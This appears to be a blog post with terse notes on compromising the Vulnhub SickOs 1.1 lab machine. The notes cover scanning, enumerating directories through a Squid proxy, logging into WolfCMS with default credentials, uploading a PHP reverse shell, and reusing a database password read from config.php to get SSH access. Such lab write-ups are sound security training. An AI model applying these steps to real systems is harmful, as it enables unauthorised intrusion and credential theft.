Tuesday, October 15, 2019

Vulnhub: SickOs: 1.1

source: https://www.vulnhub.com/entry/sickos-11,132/

192.168.1.107

22/tcp   open   ssh        OpenSSH 5.9p1 Debian 5ubuntu1.1 (Ubuntu Linux; protocol 2.0)
3128/tcp open   http-proxy Squid http proxy 3.1.19
8080/tcp closed http-proxy

maybe ubuntu 11.10/12.04

gobuster dir -p http://192.168.1.107:3128 -u http://192.168.1.107 -w /usr/share/seclists/DiscoveryWeb-Content/common.txt
/.htpasswd (Status: 403)
/.hta (Status: 403)
/.htaccess (Status: 403)
/cgi-bin/ (Status: 403)
/connect (Status: 200)
/index (Status: 200)
/index.php (Status: 200)
/robots (Status: 200)
/robots.txt (Status: 200)
/server-status (Status: 403)

curl --proxy http://192.168.1.107:3128 http://192.168.1.107/robots.txt
Dissalow: /wolfcms

http://192.168.1.107/wolfcms/docs/updating.txt
v0.8.2

https://github.com/wolfcms/wolfcms/tree/0.8.2/wolf

http://192.168.1.107/wolfcms/?/admin/login
username admin, password admin

reverse shell:
upload rs.php
http://192.168.1.107/wolfcms/public/rs.php

Linux SickOs 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 i686 i386 GNU/Linux
PRETTY_NAME="Ubuntu precise (12.04.4 LTS)"

sickos:x:1000:1000:sickos,,,:/home/sickos:/bin/bash

cat /var/www/wolfcms/config.php
define(‘DB_USER’, ‘root’);
define(‘DB_PASS’, ‘john@123’);

ssh username sickos, password john@123


Posted by at
Labels: ,

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)